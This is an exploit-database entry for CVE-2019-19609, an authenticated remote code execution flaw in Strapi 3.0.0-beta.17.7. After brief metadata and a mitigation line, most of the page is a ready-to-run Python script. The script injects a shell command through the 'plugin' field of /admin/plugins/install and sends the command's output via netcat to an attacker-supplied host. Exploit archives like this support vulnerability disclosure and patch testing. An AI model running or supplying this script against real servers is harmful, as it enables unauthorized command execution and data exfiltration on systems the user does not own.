Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)

vendor:

Strapi

by:

David Utón (M3n0sD0n4ld)

7,2

CVSS

HIGH

Remote Code Execution (RCE)

CWE

Product Name: Strapi

Affected Version From: strapi-3.0.0-beta.17.7 and earlier

Affected Version To: strapi-3.0.0-beta.17.7 and earlier

Patch Exists: YES

Related CWE: CVE-2019-19609

CPE: a:strapi:strapi:3.0.0-beta.17.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux Ubuntu 18.04.5 LTS

2021

Strapi 3.0.0-beta.17.7 – Remote Code Execution (RCE) (Authenticated)

Strapi 3.0.0-beta.17.7 is vulnerable to Remote Code Execution (RCE) when an authenticated user sends a malicious payload to the /admin/plugins/install endpoint. This payload is executed in the context of the web server user. An attacker can use this vulnerability to execute arbitrary code on the server.

Mitigation:

Update to the latest version of Strapi 3.0.0-beta.17.7 or later.

Source

Exploit-DB raw data:

# Exploit Title: Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 29/08/2021
# Exploit Author: David Utón (M3n0sD0n4ld)
# Vendor Homepage: https://strapi.io/
# Affected Version: strapi-3.0.0-beta.17.7 and earlier
# Tested on: Linux Ubuntu 18.04.5 LTS
# CVE : CVE-2019-19609

#!/usr/bin/python3
# Author: @David_Uton (m3n0sd0n4ld)
# Github: https://m3n0sd0n4ld.github.io
# Usage: python3 CVE-2019-19609.py http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST

import requests, sys, os, socket

logoType = ('''
=====================================
CVE-2019-19609 - Strapi RCE
-------------------------------------
@David_Uton (M3n0sD0n4ld)
https://m3n0sd0n4ld.github.io/
=====================================
		''')

if __name__ == '__main__':

	# Parameter checking
	if len(sys.argv) != 5:
		print(logoType)
		print("[!] Some of these parameters are missing.")
		print('''
		Use: python3 %s http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST
		Example: python3 10.10.10.10 eyJHbGCi..... "id" 127.0.0.1''' % sys.argv[0])
	# Exploit run
	else:
		# Paremeters
		url = sys.argv[1]
		token = sys.argv[2]
		command = sys.argv[3]
		lhost = sys.argv[4]
		lport = 9999
		
		s = requests.session()
		
		r = s.post(url, verify=False) # SSL == verify=True
		
		headersData = {
			'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
			'Authorization': "Bearer %s" % token
		}

		postData = {
			"plugin":"documentation && $(%s > /tmp/.m3 && nc %s %s < /tmp/.m3 | rm /tmp/.m3)" % (command, lhost, lport)
		}
		
		print(logoType)
		os.system("nc -nvlp 9999 &")
		try:
			print("[+] Successful operation!!!")
			r = s.post(url + "/admin/plugins/install", headers=headersData, data=postData, verify=False) # SSL == verify=True
			# Content print
			print(r.text)
		except:
			print("[!] An error occurred, try again.")
			sys.exit(1)